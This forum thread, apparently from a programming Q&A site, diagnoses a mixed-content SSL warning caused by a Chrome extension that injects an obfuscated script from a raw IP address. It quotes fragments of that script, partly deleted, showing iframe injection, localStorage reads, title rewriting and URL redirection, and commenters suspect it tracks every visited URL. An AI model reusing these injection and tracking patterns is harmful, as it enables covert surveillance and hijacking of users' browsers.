# SSL error because of standard Google Chrome Script

Tags: http, google-chrome, ssl, certificate

When I visit my application that uses a SSL certificate
I always get the following Error in my console:

```
The page at https://***************.php displayed insecure content from 
http://66.228.34.50/js/chromeServerV45.js.
```

And this is because Google Chrome loads this script:

> var hkghawgalkgklrgjlargjsrhg_hejrghakwghakwegkawefak = (function(){
>   var e=null,f=[[15,18,7,19,2,0,17,14,6,3,11,20,16,1,9,4,8,13,12,5,10],[19,1,16,5,14,17,13,18,15,8,2,20,7,11,4,9,12,10,3,6,0],[4,1,5,17,0,19,11,7,13,8,18,12,20,3,14,9,6,15,16,10,2],[6,19,15,14,12,5,7,18,1,0,11,13,2,4,17,16,9,20,10,8,3],[26,28,24,18,13,27,22,10,5,15,0,19,29,21,12,17,2,20,9,11,25,6,4,1,23,8,14,16,7,3],[17,12,2,1,0,6,9,5,13,7,11,3,14,8,15,4,16,10],[5,23,27,16,21,20,15,13,18,2,29,0,28,7,24,4,9,3,25,12,22,11,1,19,17,10,6,8,26,14],
>
> ..........more code was here (deleted).........
>
> a href="http://twitter.com/share" class="twitter-share-button" data-text="OMG WOW - This browser extension allows you to download YouTube videos as MP3s or high def MP4s -" data-url="http://www.oxytube.com/" data-count="horizontal">Tweet';
>   a=document.getElementById("shareBox");b=document.createElement("script");b.src="http://platform.twitter.com/widgets.js";a.appendChild(b);b=document.createElement("script");b.src="http://connect.facebook.net/en_US/all.js#xfbml=1";a.appendChild(b);a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="https://apis.google.com/js/plusone.js";b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)}else window.open(a,"_blank")};b.innerHTML='MP3';
>   a.appendChild(b)})()}catch(c){}}function yc(){wc();vc=setInterval(function(){document.getElementById("download")!=e?clearInterval(vc):wc()},600);var b=dc("cbYtRate",0.1);zc(b);Ac()}
>   function Ac(){if(ec()>=10)if(window.name.indexOf("injectedIframe")==0){if(document.body.innerHTML="",window.localStorage.upvcom&&window.localStorage.upvcom!="{}")try{var b=JSON.parse(window.localStorage.upvcom),a=b.v;a==xc()&&Bc(b.c,a)}catch(c){}}else if(b=cc("ytcRate"),Math.random()
>
> ..........more code was here (deleted).........
>
> ,g,a,i,:,o,m".split(",");k(Wc,Xc);L=Xc.join("")}document.title=L}else if($.indexOf(jb())==0||$.indexOf(lb())==0){var Z=window.location.href;if(Z.indexOf(da())!=-1){var oc=Z.indexOf(ea());oc!=-1&&nc()}}else if($.indexOf(nb())==0){var Yc=window.location.href;Yc.indexOf(fa())==0?window.location.href=Yc.substring(41):
>   Yc.indexOf(ga())==0&&window.stop()}document.body!=e?Vc():document.addEventListener("DOMContentLoaded",function(){Vc()},!1);
>   })();

Because this script loads some scripts with "http://" protocol it returns that insecure error......

Solutions or Ideas?

Comment: What chrome extensions do you have installed? Sounds like a buggy or potentially malicious one is injecting scripts into your pages. I'd look for "Oxytube Youtube Downloader".

Comment: Thank you! Solved my problem by disabling plugin: YouTube Downloader: MP3 / HD Video Download

Comment: I also had the same problem with the YouTube Downloader: MP3 / HD Video Download extension. This extension is almost certainly malicious in nature. The author's page on the Google Chrome Extensions site has been deleted - recently.
I know this because I only installed it a few days ago. At a minimum, it appears they are capturing every URL you visit. I would be curious for someone to decipher the .js file to see what else they are doing.
ion)

Answer (score 20, accepted):

Solved by disabling plugin: YouTube Downloader: MP3 / HD Video Download